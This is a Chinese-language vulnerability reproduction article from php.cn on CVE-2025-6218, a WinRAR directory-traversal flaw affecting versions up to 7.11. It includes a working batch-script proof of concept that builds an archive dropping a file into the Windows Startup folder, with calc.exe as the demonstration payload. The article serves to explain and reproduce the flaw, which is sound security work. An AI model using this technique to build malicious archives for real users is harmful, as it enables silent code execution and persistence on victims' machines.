0x00 前言
WinRAR 是一款功能全面的压缩文件管理工具,作为 RAR 压缩算法在 Windows 系统下的图形化版本,广泛应用于各类文件处理场景。
它不仅可以用于数据备份、减小电子邮件附件体积,还能解压从网络下载的 RAR、ZIP 等多种格式文件,同时支持创建新的 RAR 和 ZIP 格式压缩包。
自 5.60 版本起,WinRAR 更换了全新的图标设计,但官方仍提供主题包供用户选择,可手动恢复为经典界面风格。
0x01 漏洞概述
该漏洞源于 WinRAR 在处理压缩包内文件路径时存在逻辑缺陷,攻击者可通过构造特殊路径实现目录遍历,导致文件被释放到非预期目录,从而在当前用户权限下执行恶意代码。
0x02 CVE 编号
CVE-2025-6218
0x03 影响范围
WinRAR 版本 ≤ 7.11
0x04 漏洞验证过程
1、安装 WinRAR 软件(版本需 ≤ 7.11)
图片2、利用公开的 POC 工具生成恶意压缩包
POC 地址:
https://www.php.cn/link/e52917b6014799a313777d99a977c518
批处理脚本内容如下:
@echo offtitle CVE-2025-6218 POCecho calc.exe > POC.bat"C:\Program Files\WinRAR\WinRAR.exe" a -ap" \.. \.. \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" CVE-2025-6218.zip POC.batecho.if errorlevel 1 ( echo [!] Failed to create POC.) else ( echo [+] CVE-2025-6218.zip created successfully!)echo.del POC.batpause
注意事项:
路径中的" \.. \.. \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"需根据实际批处理文件所在目录调整上级目录数量
图片3、通过右键菜单将恶意压缩包解压至指定文件夹,触发路径跳转行为
图片4、查看目标启动目录,确认恶意脚本已成功写入
图片5、重启系统后,可观察到恶意批处理文件自动执行,弹出计算器
图片0x05 参考资料
https://www.php.cn/link/b89bd6465f1baed1810a82e1d5138f52
Ps:欢迎关注并分享国内外信息安全动态,转载请保持内容完整。如发现文章中存在敏感或侵权信息,请及时联系作者进行删除。网络安全道路漫长,感谢您的理解与支持!
本文及相关工具仅供学习交流使用,任何因传播或利用文中信息而导致的直接或间接后果,均由使用者自行承担,作者及本平台不承担任何法律责任。
以上就是【漏洞复现】CVE-2025-6218|WinRAR目录遍历远程代码执行漏洞的详细内容,更多请关注php中文网其它相关文章!
每个人都需要一台速度更快、更稳定的 PC。随着时间的推移,垃圾文件、旧注册表数据和不必要的后台进程会占用资源并降低性能。幸运的是,许多工具可以让 Windows 保持平稳运行。
Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号